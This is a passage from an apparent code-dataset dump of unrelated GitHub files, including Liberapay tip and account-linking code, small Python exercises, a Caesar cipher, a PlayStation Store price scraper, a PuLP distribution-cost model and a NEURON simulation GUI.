tippee=%s\n ORDER BY mtime DESC\n LIMIT 1\n\n \"\"\", (self.id, tippee), back_as=dict, default=default)\n\n\n def get_tip_distribution(self):\n \"\"\"\n Returns a data structure in the form of::\n\n [\n [TIPAMOUNT1, TIPAMOUNT2...TIPAMOUNTN],\n total_number_patrons_giving_to_me,\n total_amount_received\n ]\n\n where each TIPAMOUNTN is in the form::\n\n [\n amount,\n number_of_tippers_for_this_amount,\n total_amount_given_at_this_amount,\n proportion_of_tips_at_this_amount,\n proportion_of_total_amount_at_this_amount\n ]\n\n \"\"\"\n SQL = \"\"\"\n\n SELECT amount\n , count(amount) AS ncontributing\n FROM ( SELECT DISTINCT ON (tipper)\n amount\n , tipper\n FROM tips\n WHERE tippee=%s\n AND is_funded\n ORDER BY tipper\n , mtime DESC\n ) AS foo\n WHERE amount > 0\n GROUP BY amount\n ORDER BY amount\n\n \"\"\"\n\n tip_amounts = []\n\n npatrons = 0.0 # float to trigger float division\n contributed = Decimal('0.00')\n for rec in self.db.all(SQL, (self.id,)):\n tip_amounts.append([ 
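# row: [amount, ncontributing, amount * ncontributing]; proportions are appended below\n                               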
rec.amount\n , rec.ncontributing\n , rec.amount * rec.ncontributing\n ])\n contributed += tip_amounts[-1][2]\n npatrons += rec.ncontributing\n\n for row in tip_amounts:\n row.append((row[1] / npatrons) if npatrons > 0 else 0)\n row.append((row[2] / contributed) if contributed > 0 else 0)\n\n return tip_amounts, npatrons, contributed\n\n\n def get_giving_for_profile(self):\n\n tips = self.db.all(\"\"\"\\\n\n SELECT * FROM (\n SELECT DISTINCT ON (tippee)\n amount\n , tippee\n , t.ctime\n , t.mtime\n , p.join_time\n , p.username\n , p.kind\n , t.is_funded\n , (p.mangopay_user_id IS NOT NULL OR kind = 'group') AS is_identified\n FROM tips t\n JOIN participants p ON p.id = t.tippee\n WHERE tipper = %s\n AND p.status = 'active'\n ORDER BY tippee\n , t.mtime DESC\n ) AS foo\n ORDER BY amount DESC\n , username\n\n \"\"\", (self.id,))\n\n pledges = self.db.all(\"\"\"\\\n\n SELECT * FROM (\n SELECT DISTINCT ON (tippee)\n amount\n , tippee\n , t.ctime\n , t.mtime\n , p.join_time\n , p.username\n , e.platform\n , e.user_name\n FROM tips t\n JOIN participants p ON p.id = t.tippee\n JOIN elsewhere e ON e.participant = t.tippee\n WHERE tipper = %s\n AND p.status = 'stub'\n ORDER BY tippee\n , t.mtime DESC\n ) AS foo\n ORDER BY amount DESC\n , lower(user_name)\n\n \"\"\", (self.id,))\n\n\n # Compute the total\n\n total = sum([t.amount for t in tips])\n if not total:\n # If tips is an empty list, total is int 0. We want a Decimal.\n total = Decimal('0.00')\n\n pledges_total = sum([t.amount for t in pledges])\n if not pledges_total:\n pledges_total = Decimal('0.00')\n\n return tips, total, pledges, pledges_total\n\n def get_tips_receiving(self):\n return self.db.all(\"\"\"\n SELECT *\n FROM current_tips\n WHERE tippee=%s\n AND amount>0\n \"\"\", (self.id,))\n\n def get_current_tips(self):\n \"\"\"Get the tips this participant is currently sending to others.\n \"\"\"\n return self.db.all(\"\"\"\n SELECT * FROM (\n SELECT DISTINCT ON (tippee)\n amount\n , tippee\n , t.ctime\n , p.username\n , p.join_time\n FROM tips t\n JOIN participants p ON p.id = t.tippee\n WHERE tipper = %s\n ORDER BY tippee\n , t.mtime DESC\n ) AS foo\n ORDER BY amount DESC\n , tippee\n \"\"\", (self.id,), back_as=dict)\n\n\n def get_age_in_seconds(self):\n if self.join_time is not None:\n return (utcnow() - self.join_time).total_seconds()\n return -1\n\n\n def get_account_elsewhere(self, platform):\n \"\"\"Return an AccountElsewhere instance.\n \"\"\"\n return self.db.one(\"\"\"\n\n SELECT elsewhere.*::elsewhere_with_participant\n FROM elsewhere\n WHERE participant=%s\n AND platform=%s\n\n \"\"\", (self.id, platform))\n\n\n def get_accounts_elsewhere(self):\n \"\"\"Return a dict of AccountElsewhere instances.\n \"\"\"\n accounts = self.db.all(\"\"\"\n\n SELECT elsewhere.*::elsewhere_with_participant\n FROM elsewhere\n WHERE participant=%s\n\n \"\"\", (self.id,))\n accounts_dict = {account.platform: account for account in accounts}\n return accounts_dict\n\n\n def get_mangopay_account(self):\n \"\"\"Fetch the mangopay account for this participant.\n \"\"\"\n if not self.mangopay_user_id:\n return\n return mangoapi.users.Get(self.mangopay_user_id)\n\n\n def take_over(self, account, have_confirmation=False):\n \"\"\"Given an AccountElsewhere or a tuple (platform_name, user_id),\n associate an elsewhere account.\n\n Returns None or raises NeedConfirmation.\n\n This method associates an account on another platform (GitHub, Twitter,\n etc.) with the given Liberapay participant. 
Every account elsewhere has an\n associated Liberapay participant account, even if its only a stub\n participant (it allows us to track pledges to that account should they\n ever decide to join Liberapay).\n\n In certain circumstances, we want to present the user with a\n confirmation before proceeding to transfer the account elsewhere to\n the new Liberapay account; NeedConfirmation is the signal to request\n confirmation.\n \"\"\"\n\n if isinstance(account, AccountElsewhere):\n platform, user_id = account.platform, account.user_id\n else:\n platform, user_id = map(str, account)\n\n CREATE_TEMP_TABLE_FOR_TIPS = \"\"\"\n CREATE TEMP TABLE temp_tips ON COMMIT drop AS\n SELECT ctime, tipper, tippee, amount, is_funded\n FROM current_tips\n WHERE (tippee = %(dead)s OR tippee = %(live)s)\n AND amount > 0;\n \"\"\"\n\n CONSOLIDATE_TIPS_RECEIVING = \"\"\"\n -- Create a new set of tips, one for each current tip *to* either\n -- the dead or the live account. If a user was tipping both the\n -- dead and the live account, then we create one new combined tip\n -- to the live account (via the GROUP BY and sum()).\n INSERT INTO tips (ctime, tipper, tippee, amount, is_funded)\n SELECT min(ctime), tipper, %(live)s AS tippee, sum(amount), bool_and(is_funded)\n FROM temp_tips\n WHERE (tippee = %(dead)s OR tippee = %(live)s)\n -- Include tips *to* either the dead or live account.\n AND NOT (tipper = %(dead)s OR tipper = %(live)s)\n -- Don't include tips *from* the dead or live account,\n -- lest we convert cross-tipping to self-tipping.\n GROUP BY tipper\n \"\"\"\n\n ZERO_OUT_OLD_TIPS_RECEIVING = \"\"\"\n INSERT INTO tips (ctime, tipper, tippee, amount)\n SELECT ctime, tipper, tippee, 0 AS amount\n FROM temp_tips\n WHERE tippee=%s\n \"\"\"\n\n with self.db.get_cursor() as cursor:\n\n # Load the existing connection\n # Every account elsewhere has at least a stub participant account\n # on Liberapay.\n elsewhere = cursor.one(\"\"\"\n SELECT e.*::elsewhere_with_participant\n FROM elsewhere e\n JOIN participants p ON p.id = e.participant\n WHERE e.platform=%s AND e.user_id=%s\n \"\"\", (platform, user_id), default=Exception)\n other = elsewhere.participant\n\n if self.id == other.id:\n # this is a no op - trying to take over itself\n return\n\n # Save old tips so we can notify patrons that they've been claimed\n old_tips = other.get_tips_receiving() if other.status == 'stub' else None\n\n # Make sure we have user confirmation if needed.\n # ==============================================\n # We need confirmation if any of these are true:\n #\n # - the other participant is not a stub; we are taking the\n # account elsewhere away from another viable participant\n #\n # - we already have an account elsewhere connected from the given\n # platform, and it will be handed off to a new stub\n # participant\n\n other_is_a_real_participant = other.status != 'stub'\n\n we_already_have_that_kind_of_account = cursor.one(\"\"\"\n SELECT true\n FROM elsewhere\n WHERE participant=%s AND platform=%s\n \"\"\", (self.id, platform), default=False)\n\n need_confirmation = NeedConfirmation(\n other_is_a_real_participant,\n we_already_have_that_kind_of_account,\n )\n if need_confirmation and not have_confirmation:\n raise need_confirmation\n\n # Move any old account out of the way\n if we_already_have_that_kind_of_account:\n new_stub = Participant.make_stub(cursor)\n cursor.run( \"UPDATE elsewhere SET participant=%s \"\n \"WHERE platform=%s AND participant=%s\"\n , (new_stub.id, platform, self.id)\n )\n\n # Do the deal\n cursor.run( 
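# the actual handoff: re-point the elsewhere account at this participant\n                        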
\"UPDATE elsewhere SET participant=%s \"\n \"WHERE platform=%s AND user_id=%s\"\n , (self.id, platform, user_id)\n )\n\n # Turn pledges into actual tips\n if old_tips:\n x, y = self.id, other.id\n cursor.run(CREATE_TEMP_TABLE_FOR_TIPS, dict(live=x, dead=y))\n cursor.run(CONSOLIDATE_TIPS_RECEIVING, dict(live=x, dead=y))\n cursor.run(ZERO_OUT_OLD_TIPS_RECEIVING, (other.id,))\n\n # Try to delete the stub account, or prevent new pledges to it\n if not other_is_a_real_participant:\n cursor.run(\"\"\"\n DO $$\n BEGIN\n DELETE FROM participants WHERE id = %(dead)s;\n EXCEPTION WHEN OTHERS THEN\n UPDATE participants\n SET goal = -1\n WHERE id = %(dead)s;\n END;\n $$ LANGUAGE plpgsql;\n \"\"\", dict(dead=other.id))\n\n # Log the event\n payload = dict(platform=platform, user_id=user_id, owner=other.id)\n self.add_event(cursor, 'take-over', payload)\n\n if old_tips:\n self.notify_patrons(elsewhere, tips=old_tips)\n\n self.update_avatar()\n\n # Note: the order matters here, receiving needs to be updated before giving\n self.update_receiving()\n self.update_giving()\n\n def delete_elsewhere(self, platform, user_id):\n \"\"\"Deletes account elsewhere unless the user would not be able\n to log in anymore.\n \"\"\"\n user_id = str(user_id)\n with self.db.get_cursor() as c:\n c.one(\"\"\"\n DELETE FROM elsewhere\n WHERE participant=%s\n AND platform=%s\n AND user_id=%s\n RETURNING participant\n \"\"\", (self.id, platform, user_id), default=NonexistingElsewhere)\n self.add_event(c, 'delete_elsewhere', dict(platform=platform, user_id=user_id))\n self.update_avatar()\n\n def to_dict(self, details=False, inquirer=None):\n output = { 'id': self.id\n , 'username': self.username\n , 'avatar': self.avatar_url\n , 'kind': self.kind\n }\n\n if not details:\n return output\n\n # Key: npatrons\n output['npatrons'] = self.npatrons\n\n # Key: goal\n # Values:\n # undefined - user is not here to receive tips, but will generally regift them\n # null - user has no funding goal\n # 3.00 - user wishes to receive at least this amount\n if self.goal != 0:\n if self.goal > 0:\n goal = str(self.goal)\n else:\n goal = None\n output['goal'] = goal\n\n # Key: receiving\n # Values:\n # null - user is receiving anonymously\n # 3.00 - user receives this amount in tips\n if not self.hide_receiving:\n receiving = str(self.receiving)\n else:\n receiving = None\n output['receiving'] = receiving\n\n # Key: giving\n # Values:\n # null - user is giving anonymously\n # 3.00 - user gives this amount in tips\n if not self.hide_giving:\n giving = str(self.giving)\n else:\n giving = None\n output['giving'] = giving\n\n # Key: my_tip\n # Values:\n # undefined - user is not authenticated\n # \"self\" - user == participant\n # null - user has never tipped this person\n # 0.00 - user used to tip this person but now doesn't\n # 3.00 - user tips this person this amount\n if inquirer:\n if inquirer.id == self.id:\n my_tip = 'self'\n else:\n my_tip = inquirer.get_tip_to(self)['amount']\n output['my_tip'] = str(my_tip)\n\n # Key: elsewhere\n accounts = self.get_accounts_elsewhere()\n elsewhere = output['elsewhere'] = {}\n for platform, account in accounts.items():\n fields = ['id', 'user_id', 'user_name']\n elsewhere[platform] = {k: getattr(account, k, None) for k in fields}\n\n return output\n\n def path(self, path):\n return '/%s/%s' % (self.username, path)\n\n @property\n def is_person(self):\n return self.kind in ('individual', 'organization')\n\n def controls(self, other):\n return isinstance(other, Participant) and (\n self.id == other.id or\n 
other.kind == 'group' and self.member_of(other)\n        )\n\n\nclass NeedConfirmation(Exception):\n    \"\"\"Represent the case where we need user confirmation during a merge.\n\n    This is used in the workflow for merging one participant into another.\n\n    \"\"\"\n\n    def __init__(self, a, c):\n        self.other_is_a_real_participant = a\n        self.we_already_have_that_kind_of_account = c\n        self._all = (a, c)\n\n    def __repr__(self):\n        return \"<NeedConfirmation: %r %r>\" % self._all\n    __str__ = __repr__\n\n    def __eq__(self, other):\n        return self._all == other._all\n\n    def __ne__(self, other):\n        return not self.__eq__(other)\n\n    def __bool__(self):\n        return any(self._all)\n    __nonzero__ = __bool__\n","repo_name":"amir17688/google_data_p2","sub_path":"85245_participant.py_C__Users_user_Desktop_data_2_data_google_data_liberapay_liberapay.com_.py","file_name":"85245_participant.py_C__Users_user_Desktop_data_2_data_google_data_liberapay_liberapay.com_.py","file_ext":"py","file_size_in_byte":59054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29346253119","text":"#Calculation of the check digit of a RUT\nrut = input(\"Ingrese un número de rut: \")\n\n# Initialize variables\nfactor = 2\nsuma = 0\n\n# Compute the weighted sum\nfor i in range(len(rut)-1, -1, -1):\n    suma += int(rut[i]) * factor\n    factor = (factor + 1) % 8 or 2\n\n# Compute the check digit\ndv = (11 - (suma % 11)) % 11\n\nprint(\"dv =\", dv)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_cd99fa584fb597c0ef306cb48673eb73.py","file_name":"hito1_ej5_cd99fa584fb597c0ef306cb48673eb73.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9122475233","text":"import math\nfrom models.direction import *\nclass Word:\n    def __init__(self, dir, start,end):\n        self.value = []\n        self.start = start\n        self.end = end\n        self.direction = dir\n        self.length = int(math.fabs((start.i - end.i) + (start.j - end.j)) +1)\n        self.crossword_at_with = {}#dict()\n\n        # initialize the value with '1' placeholders\n        for i in range(self.length):\n            self.value.append('1')\n\n    def add_crossword(self, at, newWord ):\n        if at not in self.crossword_at_with:\n            self.crossword_at_with[at] = newWord\n\n    def set_value(self, newValue):\n        self.value = []\n        for c in newValue:\n            self.value.append(c)\n\n    def get_nb_conflicts(self):\n        nb_conflicts = 0\n\n        for at , word in self.crossword_at_with.items():\n\n            if self.direction == Direction.Across:\n                k1 = self.start.j\n                k2 = word.start.i\n                if self.value:\n                    if self.value[at.j - k1] != word.value[at.i-k2]:\n                        nb_conflicts+=1\n            else:\n                k1 = self.start.i\n                k2 = word.start.j\n                if self.value:\n                    if self.value[at.i - k1] != word.value[at.j - k2]:\n                        nb_conflicts+=1\n        return nb_conflicts\n\n    def get_indexes_with(self,at , cross):\n        if self.direction == Direction.Across:\n            index1 = at.j - self.start.j\n            index2 = at.i - cross.start.i\n            return index1,index2\n        else:\n            index1 = at.i - self.start.i\n            index2 = at.j - cross.start.j\n            return index1,index2\n\n    def is_no_letters_at_intersects(self):\n        for at, cross in self.crossword_at_with.items():\n            i1,i2 = self.get_indexes_with(at,cross)\n            if cross.value[i2] != '1':\n                return False\n        return True\n    def get_letters_at_intersects(self):\n        d = dict()\n        for at, cross in self.crossword_at_with.items():\n            i1,i2 = self.get_indexes_with(at,cross)\n            if cross.value[i2] != '1':\n                d[i1] = cross.value[i2]\n        return d\n\n    def __eq__(self, other):\n        return self.start.i == 
other.start.i and self.start.j == other.start.j and self.end.i == other.end.i and self.end.j == other.end.j\n\n def print(self):\n print(\"Word start at (\" + str(self.start.i) + \",\" + str(self.start.j) + \") and end at (\" + str(self.end.i) + \",\" + str(self.end.j) + \")\")\n","repo_name":"tamer-abdulghani/crossword-composer","sub_path":"models/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43332119900","text":"flag = False\nwhile True:\n N = int(input())\n if N == 0: break\n arr = [str(eval(raw_input())) for _ in range(N)]\n\n if flag: print('')\n flag = True\n\n max_len = max(map(len, arr))\n\n num_cols = 51//(max_len+1)\n s = ''\n for i in range(len(arr)):\n s += ' ' * (max_len - len(arr[i])) + arr[i]\n if i == len(arr)-1: continue\n if i % num_cols == num_cols-1: s += '\\n'\n else: s += ' '\n print(s)\n \n","repo_name":"Tetragonal/kattis-solutions","sub_path":"solved/4-5/mathworksheet.py","file_name":"mathworksheet.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2597869475","text":"import random\nnum = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nch = (random.sample(num, 4))\nchstr = ''.join(ch)\nwhile True:\n val = input()\n if chstr == val:\n print('OK')\n break\n if len(val) != 4:\n print('input 4 numbers.')\n continue\n answer = ''\n for i in range(4):\n if (chstr[i] == val[i]):\n answer += chstr[i]\n else:\n answer += 'X'\n print('->' + answer)\n","repo_name":"tomossy/python","sub_path":"test/whiletest.py","file_name":"whiletest.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14378552378","text":"binary = [int(x) for x in list(input())]\nwhile len(binary) % 3 != 0:\n binary.insert(0, 0)\nans = []\nfor i in range(0, len(binary), 3):\n ta = 0\n for j in range(i, i + 3):\n # print(\"ta = \", ta, \" j = \", j)\n k = binary[j] * int(pow(2, 2 - j % 3))\n # print(binary[j])\n # print(\"k = \", k)\n # print(\"K = \", k)\n ta += k\n ans.append(ta)\n # print(\"ans = \", ans)\nprint(int(\"\".join(str(x) for x in ans)))","repo_name":"k0syan/Kattis","sub_path":"oktalni.py","file_name":"oktalni.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70980400248","text":"\"\"\"\nFile: encrypt.py\nEncypts an input string of lowercase letters and prints\nthe result. The other input is the distance value.\n\"\"\"\n\ndef encrypt(clear_text, distance):\n\tcode = \"\"\n\tfor ch in clear_text:\n\t\tordValue = ord(ch)\n\t\tcipherValue = ordValue + distance\n\t\tif cipherValue > ord('z'):\n\t\t\tcipherValue = ord('a') + distance - \\\n\t\t\t\t\t\t (ord('z') - ordValue + 1)\n\t\tcode += chr(cipherValue)\n\treturn (code)\n\t\n\ndef main():\n\tplainText =input(\"Enter a one-word, lowercase message: \")\n\toffset = int(input(\"Enter the distance value: \"))\n\t\n\tresult = encrypt(plainText, offset)\n\tprint(\"Cleartext: {:5s}. 
Offset: {:2d} Ciphertext: {:5s}\".format(plainText, offset, result))\n\t\n\t\n\t\nmain()\n","repo_name":"asuz66/Hactoberfest2020","sub_path":"Python/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16162458092","text":"class Solution:\n    def biggest_unique_substring(self, input: str) -> str:\n        # Sliding window: last_seen maps each character to its most recent\n        # index, start marks the left edge of the current window.\n        last_seen = {}\n        start = 0\n        max_substring = \"\"\n        for i, ch in enumerate(input):\n            if ch in last_seen and last_seen[ch] >= start:\n                # ch repeats inside the window: move the left edge just\n                # past its previous occurrence.\n                start = last_seen[ch] + 1\n            last_seen[ch] = i\n            if i - start + 1 > len(max_substring):\n                max_substring = input[start:i + 1]\n        return max_substring\n\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.biggest_unique_substring('abcabcda'))","repo_name":"singhujjwal/python","sub_path":"interview_questions/biggest_unique_substring.py","file_name":"biggest_unique_substring.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2410650919","text":"import pandas as pd\r\nimport requests,re\r\nfrom IPython.display import display\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ncustomer_data_file = 'output_com03.pkl'\r\n\r\nhead = {'User-agent': 'Mozilla/5.0 (Windows 98) AppleWebKit/537.36 '\r\n            '(KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 Edg/94.0.992.38',\r\n        'Referer': 'http://www.deathmetal.org/'}\r\n\r\ncustomers = pd.read_pickle(customer_data_file)\r\njogos_df = pd.DataFrame(customers)\r\n\r\nfor jogos in jogos_df:\r\n\r\n    url_alvo = \"https://store.playstation.com/pt-br/product/\"+jogos_df[jogos]['id']\r\n    print('Nome :' + jogos + ' Url :'+str(url_alvo)+' Valor Atual : '+ str(jogos_df[jogos]['basePrice']) )\r\n    try:\r\n        pagina = requests.get(url_alvo, headers=head)\r\n        print(pagina.status_code)\r\n    except Exception:\r\n        print('error')\r\n        continue  # skip this game: 'pagina' is undefined or stale after a failed request\r\n    soup = BeautifulSoup(pagina.content, 'html.parser')\r\n\r\n    valor_final = soup.find(\"span\", {\"data-qa\": \"mfeCtaMain#offer0#finalPrice\"})\r\n    jogos_df[jogos]['discountedPrice'] = valor_final\r\n    print(valor_final)\r\n\r\njogos_df.to_pickle('output_com04.pkl')\r\njogos_df.to_excel('output_com04.xlsx', sheet_name='Jogos')\r\n","repo_name":"FabriNeves/WebScraping_PSN","sub_path":"UpdateValor.py","file_name":"UpdateValor.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72748782010","text":"# Import PuLP modeler functions\nfrom pulp import *\n\n# Create the 'prob' variable to contain the problem data\nprob = LpProblem(\"BC Transportation Problem 2\",LpMinimize)\n\n\n########################### Set the constants here ###############################################\n\n\nproducts = [\"Regular\",\"GreenOnion\",\"PartyMix\"]\ndist_centres = [\"Kingman\",\"LasCruces\",\"Provo\",\"Victorville\"]\n# sites = [\"Yuma\",'Fresno','Tucson','Pomona','SantaFe','Flagstaff','LasVegas','StGeorge']\nsites = ['Tucson','Pomona']\ncustomers = ['SLC','Albuquerque','Phoenix','SanDiego','LosAngeles','Tucson']\n\nsite_dist_gas = 0.15\ndist_cust_gas = 0.08\n\nMATERIAL_COST = [[9,10,15],\n                 [11,7,14]]\n\nsite_dist_distance = [[308,276,732,471], [291,732,617,56]]\n\n\ndist_cust_distance = [[523,469,195,380,319,308],\n                      [823,276,388,695,760,276],\n                      [45,555,619,707,645,732],\n                      [607,705,358,146,84,471]]\n\n\nfixed_cost = 
{'Kingman':6000,'LasCruces':5000,'Provo':8000,'Victorville':9000}\n\nvariable_cost = {'Kingman':50,'LasCruces':30,'Provo':60,'Victorville':70}\n\n\n############################## Set objective function here #######################################\n\n\nsite_dist_choices = LpVariable.dicts(\"Quantity\",(sites,dist_centres,products),0,cat=LpInteger)\n\ndist_cust_choices = LpVariable.dicts(\"Quantity\",(dist_centres,customers,products),0,cat=LpInteger)\n\ny_dist_cust = LpVariable.dicts(\"Produce or not\",(dist_centres,customers,products),0,1,cat=LpInteger)\n\ny_dist = LpVariable.dicts(\"Construct or not\",(dist_centres),0,1,cat=LpInteger)\n\n# Transportation costs from site to distribution centre\ndef get_site_dist_objective(site_dist_distance, site_dist_gas, site_dist_choices):\n obj = 0\n for site_index in range(len(sites)):\n for dist_index in range(len(dist_centres)):\n for product in products: \n obj += (site_dist_distance[site_index][dist_index] * site_dist_gas) * site_dist_choices[sites[site_index]][dist_centres[dist_index]][product]\n return obj\n\n\n# Transportation costs from distribution centre to customer and adding the variable processing costs\ndef get_dist_cust_objective(dist_cust_distance, dist_cust_gas, dist_cust_choices):\n obj = 0\n for dist_index in range(len(dist_centres)):\n for cust_index in range(len(customers)):\n for product in products: \n obj += (dist_cust_distance[dist_index][cust_index] * dist_cust_gas + variable_cost[dist_centres[dist_index]]) * dist_cust_choices[dist_centres[dist_index]][customers[cust_index]][product]\n return obj\n\ndef getProductMix(MATERIAL_COST):\n regular_ratio = (0.7,0.2,0.1)\n green_onion_ratio = (0.3,0.15,0.55)\n party_mix_ratio = (0.2,0.5,0.3)\n product_mix = []\n \n for site in MATERIAL_COST:\n regular = sum([regular_ratio[i]*site[i] for i in range(len(site))])\n green_onion = sum([green_onion_ratio[i]*site[i] for i in range(len(site))])\n party_mix = sum([party_mix_ratio[i]*site[i] for i in range(len(site))])\n product_mix.append([regular,green_onion,party_mix])\n return product_mix\n\nobj = get_site_dist_objective(site_dist_distance, site_dist_gas, site_dist_choices) + \\\n get_dist_cust_objective(dist_cust_distance, dist_cust_gas, dist_cust_choices)\n\n# Fixed cost\nfor dist_centre in y_dist:\n obj += y_dist[dist_centre] * fixed_cost[dist_centre]\n\n# Cost of purchasing raw materials for processing at site\nproduct_mix = getProductMix(MATERIAL_COST)\n\nfor site_index in range(len(sites)):\n for prod_index in range(len(products)):\n obj += product_mix[site_index][prod_index] * sum([site_dist_choices[sites[site_index]][dist_centre][products[prod_index]] for dist_centre in dist_centres])\n\nprob += obj, \"Total Cost\"\n\n\n########################## Define constraints here #########################################\n\n\n# Minimum allowable amount of products handled\nminimum_products = {'Kingman':1000,'LasCruces':1000,'Provo':2000,'Victorville':2000}\n\nfor dist_centre in dist_centres:\n product_total = 0\n for site in sites:\n product_total += sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n prob += product_total >= minimum_products[dist_centre], (dist_centre+\"_Minimum allowable amount of products constraint\")\n\n# Maximum allowable amount of products handled\nmaximum_products = {'Kingman':15000,'LasCruces':12000,'Provo':18000,'Victorville':20000}\n\nfor dist_centre in dist_centres:\n product_total = 0\n for site in sites:\n product_total += 
sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n prob += product_total <= maximum_products[dist_centre], (dist_centre+\"_Maximum allowable amount of products constraint\")\n\n# Maximum 50% fraction from site to distibution centre constraint\nsite_to_dist_ratio = 0.5\n\nfor site in sites:\n total = 0\n for dist_centre in dist_centres:\n total += sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n \n for dist_centre in dist_centres:\n site_to_dist_supply = sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n prob += (site_to_dist_ratio * total) - site_to_dist_supply >= 0, (site+\"_to_\"+dist_centre+\"_fraction_constraint\")\n\n# Demand constraint\ndemand = [[1300,900,1700],\n [1400,1100,1700],\n [1200,800,1800],\n [1900,1200,2200],\n [1900,1400,2300],\n [1500,1000,1400]]\n\nfor cust_index in range(len(customers)):\n for prod_index in range(len(products)):\n demand_constraint = 0\n for dist_centre in dist_centres:\n demand_constraint += dist_cust_choices[dist_centre][customers[cust_index]][products[prod_index]]\n prob += demand_constraint >= demand[cust_index][prod_index], (customers[cust_index] + \"'s_\" + products[prod_index] + \" demand constraint\")\n\n\n# Maximum 60% fraction from distibution centre to customer constraint\ndist_to_cust_ratio = 0.6\n\nfor dist_centre in dist_centres:\n count = 0\n for customer in customers:\n dist_to_cust_supply = sum([dist_cust_choices[dist_centre][customer][product] for product in dist_cust_choices[dist_centre][customer]])\n cust_demand = sum(demand[count])\n count += 1\n prob += dist_to_cust_supply <= 0.6 * cust_demand, (dist_centre + \"_to_\" + customer + \"_max_fraction_constraint\")\n\n\n# Maximum one product from distribution centre to customer constraint\n\nfor dist_centre in dist_centres:\n for customer in customers:\n prob += sum([y_dist_cust[dist_centre][customer][product] for product in y_dist_cust[dist_centre][customer]]) == 1, (dist_centre + \"_to_\" + customer + \" one product constraint\")\n\n\n# Maximum one product logical constraint \n\nfor dist_centre in dist_centres:\n for customer in customers:\n for product in products:\n prob += dist_cust_choices[dist_centre][customer][product] <= y_dist_cust[dist_centre][customer][product] * maximum_products[dist_centre], \"\"\n\n# non-working distribution logical constraint\n\nfor dist_centre in dist_centres:\n product_total = 0\n supply_total = 0\n for site in sites:\n product_total += sum([site_dist_choices[site][dist_centre][product] for product in site_dist_choices[site][dist_centre]])\n\n for customer in customers:\n supply_total += sum([dist_cust_choices[dist_centre][customer][product] for product in dist_cust_choices[dist_centre][customer]])\n\n prob += product_total <= y_dist[dist_centre] * maximum_products[dist_centre], \"\"\n prob += supply_total <= y_dist[dist_centre] * maximum_products[dist_centre], \"\"\n\n\n# supply and demand logical constraint for distribution centre\n\nfor dist_centre in dist_centres: \n for product in products:\n total_outgoing_product = 0\n total_incoming_product = 0\n for customer in customers:\n total_outgoing_product += dist_cust_choices[dist_centre][customer][product]\n\n for site in sites:\n total_incoming_product += site_dist_choices[site][dist_centre][product]\n\n prob += total_incoming_product == total_outgoing_product, \"\"\n\n\n\nprob.solve()\nprint(\"Status:\", 
LpStatus[prob.status])\nfor v in prob.variables():\n    if v.varValue != 0:\n        print(v.name, \"=\", v.varValue)\n\nprint(\"Total cost:\", value(prob.objective))\n\nprint(\"===============================\")\n\nend_sum = 0\nfor site in sites:\n    for dist_centre in dist_centres:\n        for product in products:\n            end_sum += site_dist_choices[site][dist_centre][product].varValue\n\nprint(\"Total outgoing products from site:\",end_sum)\n\ndist_to_cust_sum = 0\n\nfor dist_centre in dist_centres:\n    for customer in customers:\n        for product in products:\n            dist_to_cust_sum += dist_cust_choices[dist_centre][customer][product].varValue\n\nprint(\"Total outgoing products from distribution centre\",dist_to_cust_sum)","repo_name":"gnosis-agora/operations-research-project","sub_path":"IE4210 model2.py","file_name":"IE4210 model2.py","file_ext":"py","file_size_in_byte":8953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46003803734","text":"from matplotlib import pyplot as plt\nfrom ais_model import *\nfrom neuron import h, gui\n\ndef simulation_gui():\n    # Add cell to each of the components\n    # Control Panel\n    sim_control = h.HBox()\n    sim_control.intercept(1)\n    h.nrncontrolmenu()\n    # attach_current_clamp(cell)\n    h.xpanel('TEST')\n    h.xlabel('Choose a simulation to run')\n    h.xbutton('Spike Protocol',(sim.voltage_trace, cell))\n    h.xbutton('Rheobase Protocol',(sim.rheobase_protocol, cell))\n    h.xbutton('Examine AIS change effect on cell Rheobase', (sim.plot_ais_plasticity_change, cell))\n    h.xpanel()\n    # Output panel\n    g = h.Graph()\n    g.addvar('soma(0.5).v', cell.soma(0.5)._ref_v)\n    g.addvar('AIS(0.5).v', cell.AIS(0.5)._ref_v)\n    g.size(0, 1000, -90, 90)\n    h.graphList[0].append(g)\n    h.MenuExplore()\n    sim_control.intercept(0)\n    sim_control.map()\n    input()\n\nif __name__ == \"__main__\":\n    cell = laminaNeuron()\n    cell.set_recording()\n    sim = Simulation()\n    